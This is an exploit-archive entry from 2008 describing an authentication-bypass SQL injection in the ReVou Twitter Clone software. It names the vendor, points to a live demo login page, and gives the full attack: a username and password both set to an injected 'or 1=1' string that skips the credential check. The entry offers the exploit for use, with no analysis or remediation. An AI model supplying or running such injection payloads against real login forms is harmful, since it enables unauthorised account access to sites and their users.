id: 4293
date: 11/28/2008
title: ReVou Twitter Clone (Auth Bypass) SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

=============================================================
ReVou Twitter Clone (Auth Bypass) SQL Injection Vulnerability
=============================================================


[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
    
 [~]Vendor:www.revou.com
    
 [~]Software: ReVou Online
    
 [~] Date: 28.11.2008
    
 [~] Home: www.ahacker.biz
    
 [~] contact: N/A

[~] -----------------------------------------------------------
    
    
 [~] Exploit:
    
     username: r0' or ' 1=1--
     password: r0' or ' 1=1--
    
    
 [~]login 4 d3m0:
    
     http://www.revou.com/demo/




#  0day.today [2023-03-25]  #